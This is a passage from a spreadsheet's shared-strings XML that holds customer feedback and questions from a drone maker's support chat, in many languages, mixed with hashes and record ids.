  <si>
    <t>4f682e974fb38501e55b8fb8aa657ece</t>
  </si>
  <si>
    <t>|82559418096474426192317</t>
  </si>
  <si>
    <t>ypYHP1gywkhY8lX/pkZtuSfgG+icM48lp7piUUT1hN8=</t>
  </si>
  <si>
    <t xml:space="preserve">Hi. My drone dealeared. No way to find it where then map says it would be </t>
  </si>
  <si>
    <t>Fu9KszXNtqtpc+MQ2GdSLHV6tYeyQickV7Qmv8+T/SQ=</t>
  </si>
  <si>
    <t>29a6ba68f8bbf94c323b4f753a5ad1fc</t>
  </si>
  <si>
    <t>|82559262043392272027967</t>
  </si>
  <si>
    <t>DiqbySgm6IUzxPw0o5aKKUh27nyD2pJaAVGeQzXXqWU=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t>894PMCPDA000BH</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>서비스수리중인가요</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>kMyUoBlcAlu9VDLNZrdXfW3V7hCxVWnjtTQwNlVUGKA=</t>
  </si>
  <si>
    <t>28478bf2bff317decd515dad0738da28</t>
  </si>
  <si>
    <t>|82559280082307796252208</t>
  </si>
  <si>
    <t>JywnjUK/+sP2/8SpVvt2XsUBiz6CyVf/o3njlkadsas=</t>
  </si>
  <si>
    <t>A live agent to chat with just check with me in the loop</t>
  </si>
  <si>
    <t>mjtI7YmpCEnj6Uh5GY7I0heHosMp5Hg5ddhU0mktGm0=</t>
  </si>
  <si>
    <t>40156513d672cb7dad77bbd58e36f005</t>
  </si>
  <si>
    <t>|82559657224822079686849</t>
  </si>
  <si>
    <t>JP2hr5KyTomFra07AbFhVid4knujsH/l4qwCjxr4/us=</t>
  </si>
  <si>
    <t>Problem wird nicht gelöst, nur generische unpassende Antworten</t>
  </si>
  <si>
    <t>yEjMn7CxTcNY1nfmwfu7Hg4kMSg5/5cTfBeAMlzg0cI=</t>
  </si>
  <si>
    <t>f805b9d2f6a168f8eda394e089948078</t>
  </si>
  <si>
    <t>|82559008827937506735042</t>
  </si>
  <si>
    <t>F9/ULNePDciYzn1VAyyNSnWgn4A13iEr2VrvL75szR0=</t>
  </si>
  <si>
    <t xml:space="preserve">my mini 4 pro screen going blank
</t>
  </si>
  <si>
    <t>N2vZaPNbAQx+EPznSGTZxwSGe89GyRuBdvEZPa6/H9c=</t>
  </si>
  <si>
    <t>a481949a55abd6343d4a50a3ec15fad0</t>
  </si>
  <si>
    <t>|82558901280131082896186</t>
  </si>
  <si>
    <t>NAioJPmSvc+Cf28+wgCW0rplbjVqwW8DEH6tjE+T7CMwisW10fgNLDMwPTWR89wr</t>
  </si>
  <si>
    <t>direkter Bezug zu meiner Frage nehmen</t>
  </si>
  <si>
    <t>ow/5/e1MEck/y/hSoOVwz3Eg16ntF4tffHNKG20ZtG4=</t>
  </si>
  <si>
    <t>c96b5959c7f5284e17a5d323642ee542</t>
  </si>
  <si>
    <t>|82558711648198638783174</t>
  </si>
  <si>
    <t>访客-2260d2</t>
  </si>
  <si>
    <t>Nirgendwo</t>
  </si>
  <si>
    <t>b086dbdb7c492f445218379d6bfb45f4</t>
  </si>
  <si>
    <t>8c4075d10cec61b84c6e4bfbc821d071</t>
  </si>
  <si>
    <t>|82558716277405043652736</t>
  </si>
  <si>
    <t>bKaThKRvlFNpxd2xrMRxsJQUPj5NqHvntAMFpxTx2rk=</t>
  </si>
  <si>
    <t>Apparently, you no longer have an APP for my phone or one that will work. The app was always blocked</t>
  </si>
  <si>
    <t>4pbEBOv+Atm9Y0lV3g75QFAmTWw6Pg4r1kVuQiGGiCY=</t>
  </si>
  <si>
    <t>e6fcb908f7eefee7ef534767c3313e89</t>
  </si>
  <si>
    <t>|82557783882582573492745</t>
  </si>
  <si>
    <t>wJLVQI1SrSNjXufOs9kRGbK22wf/RTg6ZaiZnvYt3K4=</t>
  </si>
  <si>
    <t>PLEASE 🙏🏼 French Please!!!</t>
  </si>
  <si>
    <t>uoBiDf77v1eFywz4EcWKpYPNMaGf7hMfv4AsFUSQvdk=</t>
  </si>
  <si>
    <t>fabe566a04536cdcfde7414d37e0c080</t>
  </si>
  <si>
    <t>|82557772369892283898907</t>
  </si>
  <si>
    <t>0YWqYNAJvxlR9Wb6o7nvlUxFi5IJ8K2yCXyGd0da2Zw=</t>
  </si>
  <si>
    <t xml:space="preserve">very friendly and helpful </t>
  </si>
  <si>
    <t>9uiKJyCbstA9yzpFjYf70GTpsQYMLitYRhcOBc7qnQI=</t>
  </si>
  <si>
    <t>bac28153c8501af7c2e1c1fa6c0f77a3</t>
  </si>
  <si>
    <t>|82557676469349370562604</t>
  </si>
  <si>
    <t>10IEj70Y/9ZDhVw/VLcIgA==</t>
  </si>
  <si>
    <t>prompt response</t>
  </si>
  <si>
    <t>uNdXuYOiwBPJqFZZgu1FhTitvNA2JOeVADi5lNbFjpQ=</t>
  </si>
  <si>
    <t>8720b3bdd76d833944031ed65b262796</t>
  </si>
  <si>
    <t>|82556327540078071772544</t>
  </si>
  <si>
    <t>bZOCzBEytqcKtfXYinoKnsfMyR7xFsy2s0Ts1+hfToI=</t>
  </si>
  <si>
    <t>nice im very satisfaied</t>
  </si>
  <si>
    <t>QYFLpVYQAPwhWEp/mPwV4f+49j+Mr7CT+Mk5BAazRbM=</t>
  </si>
  <si>
    <t>758851bfa4b5f3f5a3c44537a2838320</t>
  </si>
  <si>
    <t>|82556282503936892229049</t>
  </si>
  <si>
    <t>CW60GGD0bjqAmcPkI7i/RtpjofUTC49wnlz53YM/O0o=</t>
  </si>
  <si>
    <t>je n'arrive pas à acheter une pièce de mon DJIMINI 4 J'ai DJI mini4 pro Un petit soufflet en plastiq</t>
  </si>
  <si>
    <t>BNp3GI8WA+/PCau20zIHp2SO3niMTssusqupxP249Pw=</t>
  </si>
  <si>
    <t>d9cda2ef3058f12bbc7edcdeac3995ea</t>
  </si>
  <si>
    <t>|82555960380798640110036</t>
  </si>
  <si>
    <t>2QdZAwEo8rOAp2rgR8Guhw==</t>
  </si>
  <si>
    <t>q6dp2J7XGDiCfA8il3OGaVGqKUJw5HO3fUL/7Xgo/Kg=</t>
  </si>
  <si>
    <t>3bf346658b0de11af8014ef68387e5de</t>
  </si>
  <si>
    <t>|82555818483269436599061</t>
  </si>
  <si>
    <t>OhdERiDIxhBGbjBhMIuZbA==</t>
  </si>
  <si>
    <t>The f a drone's own will not take the serial number of my aboditude as the r I d can you help</t>
  </si>
  <si>
    <t>YKMWutxtrScQn0KkJgXUQNe1V7xiNOUvtP3kuT376bs=</t>
  </si>
  <si>
    <t>6141148d214471386d732a293e701cb1</t>
  </si>
  <si>
    <t>|82555267269582196841251</t>
  </si>
  <si>
    <t>VWN5czpRd5MmnMePTLQFLpq4+txxXUUYSfORgGXFXAE=</t>
  </si>
  <si>
    <t>Why is it so hard to get a shipping label or address to send an item for repair?</t>
  </si>
  <si>
    <t>Mm7ZJL1RswKiq/9PecAyou4NCtJ/bgG3THfoc+PGgWY=</t>
  </si>
  <si>
    <t>adbb51301414900ad792d608ed69d4ba</t>
  </si>
  <si>
    <t>|82555208088471068523968</t>
  </si>
  <si>
    <t>LZe8f07FcxU6AK8Bd83wjOpeEJYfEvgC8DSucmU3xlc=</t>
  </si>
  <si>
    <t>no reply!</t>
  </si>
  <si>
    <t>vQ8Lhp+h5K5egvNsVILYRWE465nkAnDj9wEAFuLjqHs=</t>
  </si>
  <si>
    <t>9e27d8c8e0d5685cab3387ad03b61430</t>
  </si>
  <si>
    <t>|82555121118407787954753</t>
  </si>
  <si>
    <t>Cdo/wDMeFQlgI2u2zncobQ==</t>
  </si>
  <si>
    <t>Hi,
I have drone Dji mini 3 pro and RC2 remote cotroller. 
Is it possible both work together?</t>
  </si>
  <si>
    <t>q0Od8ZVkh+LdVo1N6VctSzY3kY5B52Eu6D0zVTHBUtA=</t>
  </si>
  <si>
    <t>8c3b838acb1b627561ff69649fbf5f41</t>
  </si>
  <si>
    <t>|82554571393202997065523</t>
  </si>
  <si>
    <t>RGrj56Q/jOKqdUXhsQVn+A==</t>
  </si>
  <si>
    <t>kan geen Software voor mijn FHantom1 niet vinden heel jammer ik hoop dat U mij kan helpen</t>
  </si>
  <si>
    <t>nKPosqRE6r6QkHiOYZp08i/WrdS80dN4qUahRvpdDw4=</t>
  </si>
  <si>
    <t>f27d90de4e95564f663dae732c4b7af2</t>
  </si>
  <si>
    <t>|82554572601283018619309</t>
  </si>
  <si>
    <t>5flC0WjwgmY92ibu/NKu9A==</t>
  </si>
  <si>
    <t>My query was not addressed.  Some other/generic info was given, of no use to me.</t>
  </si>
  <si>
    <t>yobU8XBvFLIKm1A8cCbCZw==</t>
  </si>
  <si>
    <t>254ec7aae10ea16cf61a7107fae6bf51</t>
  </si>
  <si>
    <t>|82554549370702806290637</t>
  </si>
  <si>
    <t>9BxiVbzL7CpLgCWNX6xumAhQlW/fiMuqx0h1VyP2VCk=</t>
  </si>
  <si>
    <t xml:space="preserve">Everything </t>
  </si>
  <si>
    <t>1F91ej1hzfCPesl+8MKiq8PTRCb1G1IkQazrN/YJidY=</t>
  </si>
  <si>
    <t>4d6f85e1b6e3bfd289a4475c7263d1f3</t>
  </si>
  <si>
    <t>|82553557637199327140264</t>
  </si>
  <si>
    <t>mkWZVYprvahx44/3/V4gEILpwhYtkPlhO36RKJ3f+10=</t>
  </si>
  <si>
    <t>Je ne suis pas satisfaite de la solution donner,
Pas de solution pour ma commande.</t>
  </si>
  <si>
    <t>S827FAsYVkKXSRMeB1y1zV3uu7hOSYc1/t2fRmy71nE=</t>
  </si>
  <si>
    <t>c0aeefac95d9ef3242fbc229eba10573</t>
  </si>
  <si>
    <t>|82553408380334916994606</t>
  </si>
  <si>
    <t>Je ne suis pas satisfaite de la solution apporter pour ma commande n°0330868360911</t>
  </si>
  <si>
    <t>ac4c51890fa689537324f36273bade04</t>
  </si>
  <si>
    <t>es_sp14</t>
  </si>
  <si>
    <t>|82555321972792072734509</t>
  </si>
  <si>
    <t>F4Mf7BWgrvq59dpEs/LEoA==</t>
  </si>
  <si>
    <t>The fastest and most efficient customer service I've encountered to date.</t>
  </si>
  <si>
    <t>Q7iSXg2eYjsCSg4jOOJA0f5iQnSTeSDVeag/a87j/Vk=</t>
  </si>
  <si>
    <t>a055af148b05193b1b15f5b494022705</t>
  </si>
  <si>
    <t>|82554081501815063494228</t>
  </si>
  <si>
    <t>WJwYlDW8v5xaL9HHSWaeUgyqlW/QPfkmGLMJIh5PMPhMUNZAoqCjO+uazodJCOLy</t>
  </si>
  <si>
    <t xml:space="preserve">I spoke to someone yesterday, he or she gave me wrong information, waste half of day at Brisbane </t>
  </si>
  <si>
    <t>374ej3TLbDPabRhMisi3xrIqMYF8KjZXe/oZGEJ9ULU=</t>
  </si>
  <si>
    <t>79e588563f2dc5f810cb6591e318958b</t>
  </si>
  <si>
    <t>|82552879701964541735275</t>
  </si>
  <si>
    <t>dpnuxB99e52T9LfNzqq+z53bJuUwW49lGayiUfpoJZQ=</t>
  </si>
  <si>
    <t xml:space="preserve">Schon zweimal dieselbe Frage gestellt. Leider keine Antwort erhalten. </t>
  </si>
  <si>
    <t>fluLaq3MU63P27UMDTKRYpCu2aU3vjtGgfXBHZSiZLc=</t>
  </si>
  <si>
    <t>7156954afce3adab3dc2a954bfe103d7</t>
  </si>
  <si>
    <t>|82552529129473332696746</t>
  </si>
  <si>
    <t>aVES8Du+IL8gg4c3I9Tchg==</t>
  </si>
  <si>
    <t>Helpful</t>
  </si>
  <si>
    <t>sAsHEG4p+F6Yrqz/wKoI24cUHn9pMbd/t3pHjYwF9Rc=</t>
  </si>
  <si>
    <t>00b224b916e5348752368764b19ee59c</t>
  </si>
  <si>
    <t>|82552518725336895958188</t>
  </si>
  <si>
    <t>L2lg4lfEKRbm41e47Nv1Jg==</t>
  </si>
  <si>
    <t xml:space="preserve">Simle but can be better with the UPS set up
</t>
  </si>
  <si>
    <t>1ExsuBSErbVgvWnht6eUHlZ6GSazuzwfldxgAic3+4Q=</t>
  </si>
  <si>
    <t>a814917fae1b5e3d0ab21331e027bf1c</t>
  </si>
  <si>
    <t>|82552046896584717172098</t>
  </si>
  <si>
    <t>hpc43nWeFUxSEcqB1jvIiaMIKC+ha9+11QmYnNmyES0=</t>
  </si>
  <si>
    <t xml:space="preserve">Ho acquistato un mini 3 pro con DJI care ma nella confezione non c'è il codice di attivazione, come </t>
  </si>
  <si>
    <t>aoM70pALRvJkEOisZtteAu0jL+0V7Asa6TLJ8DCxBZ0=</t>
  </si>
  <si>
    <t>1d39e10799a2fb966992d04ca5f2dcfd</t>
  </si>
  <si>
    <t>|82551778454082401270407</t>
  </si>
  <si>
    <t>0wnpzXIbH2fEj8EYbZoJhw==</t>
  </si>
  <si>
    <t>I am here</t>
  </si>
  <si>
    <t>Qw5jv6L686D6qQ6KWRh3bJWsl2sZbEeXXR7R5wyvuro=</t>
  </si>
  <si>
    <t>cb0f27485347fb7d0d2f98f84cea4096</t>
  </si>
  <si>
    <t>|82552050285184824324642</t>
  </si>
  <si>
    <t>o5McfsScdpjT6LM7j3HrgYgBYfgZMnkbVsIvynUvHRw=</t>
  </si>
  <si>
    <t>J'aimerai réupérer ma facture, et il est impossible d'accéder à un service pouvant me proposer cela.</t>
  </si>
  <si>
    <t>42Ycq4uwUvkgePvFlMWyw0ZwUef+VLTbCeQlfPPFn18=</t>
  </si>
  <si>
    <t>02853ea8d910846bb526b5e94cd186a0</t>
  </si>
  <si>
    <t>|82552019456584012881443</t>
  </si>
  <si>
    <t>5N3w+412FF/ArU0R9xD6bHkfn/nUWkSW9s6x4R8Rmp4=</t>
  </si>
  <si>
    <t>Thank you for your service.</t>
  </si>
  <si>
    <t>O6MYF4JbztcQ4KpE0+HvgazYQWwOY76AxP7bVOfR3hw=</t>
  </si>
  <si>
    <t>6d34fba9d08a8c1f709584d3b7bbeb85</t>
  </si>
  <si>
    <t>jp_sp37</t>
  </si>
  <si>
    <t>|82551425680809417970722</t>
  </si>
  <si>
    <t>QGz5LCcdKSzQMmHmrSzZSA==</t>
  </si>
  <si>
    <t>ネットワーク接続が出来ない</t>
  </si>
  <si>
    <t>k3FZ24xi4wmtlOWnr06VmtF0FkGoMSfcxjZRUnC+x0Y=</t>
  </si>
  <si>
    <t>1af1038e3beb6996b0d0fe027a825ebb</t>
  </si>
  <si>
    <t>|82550956407838600459046</t>
  </si>
  <si>
    <t>yv9cg15bC22GY+EqCqu+Npq4oS3H/5qkZObmrVbvszw=</t>
  </si>
  <si>
    <t>Why so sure ?</t>
  </si>
  <si>
    <t>ECV6sjO4RVsKlr6wGvRdGa7bB2J3NERwIm5eerygeW0=</t>
  </si>
  <si>
    <t>b8129a010f44457940f2b6507c87065f</t>
  </si>
  <si>
    <t>|82550624635462561246732</t>
  </si>
  <si>
    <t>P2lM8TVrBu/hByEeD45BP803caTV96RpJCNEDIvNPxA=</t>
  </si>
  <si>
    <t>It lead to my problem. Thanks</t>
  </si>
  <si>
    <t>rjIgDgYB5pA9kpoy5RajNDTBfEnu39/sTq6SU1+HOdI=</t>
  </si>
  <si>
    <t>806c1763b5b4b8e91f8b06cae3f3447a</t>
  </si>
  <si>
    <t>fb_sp16</t>
  </si>
  <si>
    <t>|82550114918839426254429</t>
  </si>
  <si>
    <t>O87Wo2cr7PolGD0imN1eDLMZTJ60px73lnSuBb4mpsI=</t>
  </si>
  <si>
    <t>Selena hanıma çok teşekkür ediyorum</t>
  </si>
  <si>
    <t>CoxtNLvpb6LxE9GrQwdxnw0rHXLLVJvv6MA+fAB0rxA=</t>
  </si>
  <si>
    <t>b5125b1e675d5cf76f45a376b1944568</t>
  </si>
  <si>
    <t>|82549350153868312235150</t>
  </si>
  <si>
    <t>NNysbf7s6kR9B1wJDgiYkg==</t>
  </si>
  <si>
    <t>Ease of finding an email address with screens. Do't limit number of letters here</t>
  </si>
  <si>
    <t>4K1+sSthPLAccp1I5bN+Bwl7TKvTvemV04PCGZncssg=</t>
  </si>
  <si>
    <t>be84b1863bcccfa3935aa453306d1cbb</t>
  </si>
  <si>
    <t>|82549260177526834797017</t>
  </si>
  <si>
    <t>131MozcB6PEFlBOybzAbdA==</t>
  </si>
  <si>
    <t xml:space="preserve">activation issues
</t>
  </si>
  <si>
    <t>87aBmkphnNa+lXUQ1K615Mj4jz1xy/J4A1+M+Y3IHso=</t>
  </si>
  <si>
    <t>f848f5c4b2112013d451d729030d74c5</t>
  </si>
  <si>
    <t>|82549019048647697217489</t>
  </si>
  <si>
    <t>QM5Dn46yg19WwfFXg+Y+Iuoa2o26CRGns696CB91GmM=</t>
  </si>
  <si>
    <t>I couldn't speak to a real person.</t>
  </si>
  <si>
    <t>WNoAiaBDsE97kghk3ga9cWz9YkQX4PWUuyTjZSV1a40=</t>
  </si>
  <si>
    <t>a763b6dfd57770c0dd361b73b53ac406</t>
  </si>
  <si>
    <t>au_sp3</t>
  </si>
  <si>
    <t>|82547212814285369022096</t>
  </si>
  <si>
    <t>QvSMc76kQY4UXHlwUMtcbg==</t>
  </si>
  <si>
    <t>More case sensitivity</t>
  </si>
  <si>
    <t>NGqcU34QXh5eyIx6KRNRINcNGUBapHkR1JapbZVMc3I=</t>
  </si>
  <si>
    <t>1bbb6f386e428496b129ba7b938aa8ce</t>
  </si>
  <si>
    <t>|82546505761117620359153</t>
  </si>
  <si>
    <t>zx8jMxTBHGUjEK+LrkPbsQ==</t>
  </si>
  <si>
    <t>Had a meeting come up and they finished what we were working on for me, two thumbs up!</t>
  </si>
  <si>
    <t>hJpnwPlTJdrXdaovRcEd92va9/swFYGcW48a4eFRe4Y=</t>
  </si>
  <si>
    <t>28be9802f2921151f8a4bfcdf600ebad</t>
  </si>
  <si>
    <t>|82547109140765230783915</t>
  </si>
  <si>
    <t>UXVhTnyGSPCwBalAcG04tA==</t>
  </si>
  <si>
    <t xml:space="preserve">I’m having trouble with doing the video verification I need some assistance </t>
  </si>
  <si>
    <t>NdGvNfmTbXAwqKen1DdRhcrwlnxrYUFiJ7ifgHY/tjA=</t>
  </si>
  <si>
    <t>7ffb047eddb261c1927bb281e10e06a5</t>
  </si>
  <si>
    <t>|82545987900117070970004</t>
  </si>
  <si>
    <t>yk8jIeUrGxQNAjOBf6eD7cov3jeZD5DVqbo7UvAA1C0=</t>
  </si>
  <si>
    <t>Thank you for the quick responses despite I had to leave for work</t>
  </si>
  <si>
    <t>d1DiboOvJ0ir71mpd/wE2g==</t>
  </si>
  <si>
    <t>021274bae1969fb2915b95a580d55a5f</t>
  </si>
  <si>
    <t>|82544762483075562813264</t>
  </si>
  <si>
    <t>J2NHJeowf/OpONX9mRUN7QqFSH4JrllX+CuU2BNFsiE=</t>
  </si>
  <si>
    <t>I just purchased a Dji avata two and it won’t connect to the app or my Dji fpv goggles v2.</t>
  </si>
  <si>
    <t>7V8Engc0GaVHAtotgXHfyhw+zk9ixXFxP5TR0WPfDFs=</t>
  </si>
  <si>
    <t>cfb9ff7673fbef49b7aa36c8eac1edac</t>
  </si>
  <si>
    <t>|82544808998129297553778</t>
  </si>
  <si>
    <t>LFZM+Iuum6A1w9UG/ZWE9A==</t>
  </si>
  <si>
    <t>I am back.</t>
  </si>
  <si>
    <t>xuvvEtBYsEe8Y5JNXROAoaTl03V7v4PhTOCq5oTUk88=</t>
  </si>
  <si>
    <t>e5a56a5c201c6976d929220ad08b2134</t>
  </si>
  <si>
    <t>|82544584230115854064227</t>
  </si>
  <si>
    <t>kN8qociRWS7ZOJMYS/sObFUaOn+aMFmsBgdtYn2KF2E=</t>
  </si>
  <si>
    <t xml:space="preserve">Very helpful </t>
  </si>
  <si>
    <t>QqtmYb5wYekOlh8qcn68V2CCmncrv+/ejzFxv47OKHI=</t>
  </si>
  <si>
    <t>89d4412bbb3d8f3d8ca0cb80149f397f</t>
  </si>
  <si>
    <t>|82544260052176793458098</t>
  </si>
  <si>
    <t>Ju7jZT1KPTBhsiJVu0Y/QcgqthTLn4K1toc5puhKznw=</t>
  </si>
  <si>
    <t>hi</t>
  </si>
  <si>
    <t>7eLMkABgOiVw+Xs7ebLgBbjtBEz+/lTOFMIDuAlrhOs=</t>
  </si>
  <si>
    <t>14369fe8899862a76301935b8de3db03</t>
  </si>
  <si>
    <t>|82543604200457696253331</t>
  </si>
  <si>
    <t>nD7OvkbQ3fiR0koe9WOmRvA6JakI4jbwLZvqBvOAZ1o=</t>
  </si>
  <si>
    <t xml:space="preserve">1
</t>
  </si>
  <si>
    <t>ffsoKg6qi0R75ZXDwmLBAIo21ubDJlYYHsonoqrXE8s=</t>
  </si>
  <si>
    <t>52e684119a05e85e6b5522fe906f1d88</t>
  </si>
  <si>
    <t>|82542247684272049312281</t>
  </si>
  <si>
    <t>TFA8YQXPq0j6wRsMyINiQrwrGT8S4MhnSJz19mg2JrE=</t>
  </si>
  <si>
    <t>You deleted my long fucking message as I was typing it! Now I have to start over!</t>
  </si>
  <si>
    <t>/yBvl9K6cSvHfPd8UubWDW/30fKl3rZ640LiDq6TNE4=</t>
  </si>
  <si>
    <t>15afdc0a269fab3c213991d2169fee63</t>
  </si>
  <si>
    <t>|82542534462948478580185</t>
  </si>
  <si>
    <t>UV+kn+jwMr4B+fDI76I51EQrspO+wyPaLpYFzIf6ihQ=</t>
  </si>
  <si>
    <t>can osmo 7 p compatible  with S 25?</t>
  </si>
  <si>
    <t>cTXeOIJBDvZO6l7rhjOFzdtUQo3A1/TVDo05kPLhTvs=</t>
  </si>
  <si>
    <t>447760574e77458b302f15fe9ff2faa0</t>
  </si>
  <si>
    <t>|82541233161429469583698</t>
  </si>
  <si>
    <t>sxbYrJV1a/2+V8QYNs5rEw==</t>
  </si>
  <si>
    <t>vague need a person - keeps disconnecting chat at replacement</t>
  </si>
  <si>
    <t>lfJnRnNneVVvz5ijezk+beLCNMj5TFDuS84MCfYR4qE=</t>
  </si>
  <si>
    <t>14fc3834c5ad7ffc426887c06a0f7f89</t>
  </si>
  <si>
    <t>|82541602493231893239732</t>
  </si>
  <si>
    <t>1q85WYd0W2fowtsQfUTUECfrBTUxhKVaNCE2XrjAvOOQrDDdbyS9t+H9K4lyIlRF</t>
  </si>
  <si>
    <t>Buongiorno</t>
  </si>
  <si>
    <t>d8kCr7fo+mvKrwPkVk5N1BpvM3KkbTZIXNh236p4bzw=</t>
  </si>
  <si>
    <t>3e41d283a2f4b5f72e6ea2a39ac2d32e</t>
  </si>
  <si>
    <t>|82541793968837331387403</t>
  </si>
  <si>
    <t>Z9PzwNWRyQSrbHB6iOpH/Q==</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>접속</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>끊김</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>반복</t>
    </r>
  </si>
  <si>
    <t>fc+MHfOV7/EycQJLXKSI+Q==</t>
  </si>
  <si>
    <t>cf93ec868c9ae3c5dad31f8b96386b44</t>
  </si>
  <si>
    <t>|82541596851059216386160</t>
  </si>
  <si>
    <t>xM/p5D5VVkbV6CTgf61U4iNM0629fjcmIMcgTQ+3kng=</t>
  </si>
  <si>
    <t>It’s the end of the day and I was told someone would get back with me by today…</t>
  </si>
  <si>
    <t>hY+8uHGZOakZsjgevDvJs8bjsaolIl1jsr136uJl9Y4=</t>
  </si>
  <si>
    <t>2ab70a2ce68f29d4383d1e815b012d14</t>
  </si>
  <si>
    <t>|82541231289839438067282</t>
  </si>
  <si>
    <t>fED3OvLlz0avF8iFcfRpHQ==</t>
  </si>
  <si>
    <t>H</t>
  </si>
  <si>
    <t>HSG9KuA+QYyps0y2hmGyhOoR5MK0RSWi/Dnpu9WJmAo=</t>
  </si>
  <si>
    <t>2643dc98729274fe7e8abb3ad226e47b</t>
  </si>
  <si>
    <t>au_sp2</t>
  </si>
  <si>
    <t>|82541024973735916685555</t>
  </si>
  <si>
    <t>oJQAEjPgmU+mA9uSWYeMiA==</t>
  </si>
  <si>
    <t>quick service realising human req, I wish the info entered to the virtual assist was read by ALL</t>
  </si>
  <si>
    <t>saaeoPBihGFX0RWCvLNSUeZQhHzTUCR1yOygxDwduo0=</t>
  </si>
  <si>
    <t>2fa4c7448baa8a229f8569ea02c5ea16</t>
  </si>
  <si>
    <t>|82541524297378317654677</t>
  </si>
  <si>
    <t>yem4gvzmg1s9FsBI90wRUw==</t>
  </si>
  <si>
    <t>the options irequire, as in advice on a service request is not available leaving me in a loop on non</t>
  </si>
  <si>
    <t>zpntAhbX4XZecX20/V217jbDaU71IpphH4RICY9emGg=</t>
  </si>
  <si>
    <t>e2e0a43eac7a03a57ab86c0d14aeed74</t>
  </si>
  <si>
    <t>|82539889790424099611223</t>
  </si>
  <si>
    <t>q0SNi4IvETFqpFpHF8anW1MEi74KanCViEZn5LriAF4=</t>
  </si>
  <si>
    <t>Hi I have a Dji mini 2 se but it only flye 50m away is that normal it can it fly further?</t>
  </si>
  <si>
    <t>qwr25vzdyWdwN4bwcsqqUP26iftepLSBHji5HzBFfA8=</t>
  </si>
  <si>
    <t>4d1f7205913f581b0bf10669afff3003</t>
  </si>
  <si>
    <t>|82539643867921649987799</t>
  </si>
  <si>
    <t>6yXj/6mf0QcoSRGcy/Tfv/55SsGnxt6hHGfMe3MNij8=</t>
  </si>
  <si>
    <t>I normally don't find automated chat assistance very helpful. this one did the job. thanks.</t>
  </si>
  <si>
    <t>Ny6DSYrlML+NLAQY0JRlz/L/ThX9BmbW3xDiJ45yh38=</t>
  </si>
  <si>
    <t>77a8b3465c2c85544f5f1b0696d3dd7f</t>
  </si>
  <si>
    <t>|82539623666716587961608</t>
  </si>
  <si>
    <t>18wKoa6mU7/LKriTedolXw==</t>
  </si>
  <si>
    <t>my problem that needs to be resolved as soon as possible has been left unanswered. thanks for the "h</t>
  </si>
  <si>
    <t>0IofGeN/AzQfe4xlxO+4Bq/cbS+rWOSkXLEIWUmKJ4U=</t>
  </si>
  <si>
    <t>e4d990a9159725ed1d3ec93ad9e6cd52</t>
  </si>
  <si>
    <t>|82539553108395380355364</t>
  </si>
  <si>
    <t>BfWZOeUQCRwE3vOnbDzMGg==</t>
  </si>
  <si>
    <t>Is case CAS-22015828-B9B1X6. closed resolved.  If not please close.  I believe the mc3 to be fault</t>
  </si>
  <si>
    <t>kXBwXizwrqvahv7VVv69xv24PHNSTNlgmcaq8JZEA2Q=</t>
  </si>
  <si>
    <t>0bc3d38012c92a5c8c59e395a4101b4b</t>
  </si>
  <si>
    <t>|82539533072295045557700</t>
  </si>
  <si>
    <t>访客-85f637</t>
  </si>
  <si>
    <t>Er hat mein Anliegen keinesfalls verstanden</t>
  </si>
  <si>
    <t>63c0ab29a16e584bfa3b73253d800f6a</t>
  </si>
  <si>
    <t>09607899df09122e775546aa5203a60e</t>
  </si>
  <si>
    <t>|82538866615594692050615</t>
  </si>
  <si>
    <t>m08ZNi5w6fL1J6NvRsgf/8CANvZenJyWXBZLBIu6qKU=</t>
  </si>
  <si>
    <t>It timed out and popped up this rating dialog, losing what I was typing!!</t>
  </si>
  <si>
    <t>VDYlJdqnEyRCvYxSCG4v3G9xwKCVZ1fwU8bX/ksR5M8=</t>
  </si>
  <si>
    <t>842e07f0b2f375f290326040973651ed</t>
  </si>
  <si>
    <t>|82537987563407272290062</t>
  </si>
  <si>
    <t>TX/afLPsSjt2Mf3AI9tfnoySS2/GnjNqj6CMWXK4fMhrHLV2jhDW855J2+pnaqL7</t>
  </si>
  <si>
    <t>fucking worthless</t>
  </si>
  <si>
    <t>S8GLPLS6Enlf6m3suSV6uJQecLZIv0JQSa8jz+xapR8=</t>
  </si>
  <si>
    <t>cd48b83263df0f430b145ed39fdb9044</t>
  </si>
  <si>
    <t>|82537866747925094661439</t>
  </si>
  <si>
    <t>scQZ08CYJB1ZnIhBxS1nSFAA6O4EHg+GxLdsuIN/Zag=</t>
  </si>
  <si>
    <t>The chat ends without providing me with an agent to talk with.</t>
  </si>
  <si>
    <t>GYOwkeOnZfl5VsPdp8mhTleGfvMV1Z491RleEYy6RQU=</t>
  </si>
  <si>
    <t>0d860d2460cc2ab67fa9b682d7a98de8</t>
  </si>
  <si>
    <t>|82537682570042288233912</t>
  </si>
  <si>
    <t>3+ISVCj/9mUYWRFRayzIGSkx4kRe9Fqes26HJIEJelg=</t>
  </si>
  <si>
    <t xml:space="preserve">unbaind </t>
  </si>
  <si>
    <t>Z2JeqcuAX6e0q+o8dHpAK1qV8kHaaGGWBjq7iXZrLKU=</t>
  </si>
  <si>
    <t>03bd713f94135610c4e15707168dcdca</t>
  </si>
  <si>
    <t>|82536022251083341856026</t>
  </si>
  <si>
